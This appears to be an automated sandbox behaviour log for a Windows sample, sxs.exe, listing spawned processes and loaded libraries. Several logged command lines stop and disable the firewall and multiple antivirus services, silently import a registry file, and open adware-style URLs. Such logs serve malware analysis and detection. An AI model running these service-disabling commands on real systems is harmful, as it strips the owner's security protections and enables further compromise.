Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop kavsvc
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsCCenter
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsRavMon
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe"
Source: C:\Windows\wuauclt.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" http://www.dvdforone.com
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe"
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccess
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVWSC
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVSrvXP
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVSrvXP start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop kavsvc
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config kavsvc start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsRavMon start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsCCenter
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsCCenter start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsRavMon
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop sharedaccess
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVWSC
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop kavsvc
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsCCenter
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsRavMon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\wuauclt.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" http://www.dvdforone.com
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\sxs.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\wuauclt.exe | Section loaded: apphelp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wininet.dll
Source: C:\Windows\wuauclt.exe | Section loaded: urlmon.dll
Source: C:\Windows\wuauclt.exe | Section loaded: iertutil.dll
Source: C:\Windows\wuauclt.exe | Section loaded: srvcli.dll
Source: C:\Windows\wuauclt.exe | Section loaded: netutils.dll
Source: C:\Windows\wuauclt.exe | Section loaded: sspicli.dll
Source: C:\Windows\wuauclt.exe | Section loaded: windows.storage.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wldp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: profapi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\wuauclt.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\wuauclt.exe | Section loaded: winhttp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: mswsock.dll
Source: C:\Windows\wuauclt.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: winnsi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: uxtheme.dll
Source: C:\Windows\wuauclt.exe | Section loaded: dnsapi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: propsys.dll
Source: C:\Windows\wuauclt.exe | Section loaded: edputil.dll
Source: C:\Windows\wuauclt.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wintypes.dll
Source: C:\Windows\wuauclt.exe | Section loaded: appresolver.dll
Source: C:\Windows\wuauclt.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\wuauclt.exe | Section loaded: slc.dll
Source: C:\Windows\wuauclt.exe | Section loaded: userenv.dll
Source: C:\Windows\wuauclt.exe | Section loaded: sppc.dll
Source: C:\Windows\wuauclt.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\wuauclt.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: ieframe.dll
Source: C:\Windows\explorer.exe | Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: version.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: mlang.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: pcacli.dll
Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: authz.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: aclui.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: clb.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\regedit.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: ieframe.dll
Source: C:\Windows\explorer.exe | Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: version.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: mlang.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: pcacli.dll
Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
